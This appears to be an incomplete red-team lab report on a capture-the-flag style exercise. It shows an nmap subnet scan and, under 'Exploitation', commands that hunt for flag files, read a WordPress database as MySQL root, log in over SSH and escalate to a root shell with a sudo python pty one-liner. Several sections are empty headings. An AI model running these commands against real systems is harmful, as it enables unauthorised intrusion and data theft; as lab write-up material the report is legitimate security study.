Offensive Report

Red Team: Summary of Operations

Table of Contents

Exposed Services

Nmap scan results for each machine reveal the below services and OS details:

$ nmap ... -sV -oN namp_scan.txt 192.168.1.0/24

NMAP Scan Output

This scan identifies the services below as potential points of entry:

The following vulnerabilities were identified on each target:

Exploitation

The Red Team was able to penetrate Target 1 and retrieve the following confidential data:

cd /var/www/html 
grep -r flag 
cd /var/www
cat flag.txt
mysql -u root -p
use wordpress
select * from wp_posts
ssh steven@192.168.110
sudo python -c 'import pty;pty.spawn("/bin/bash");'

Revision #1
Created 2025-12-08 18:17:30 UTC by David Rizzo
Updated 2025-12-08 18:17:31 UTC by David Rizzo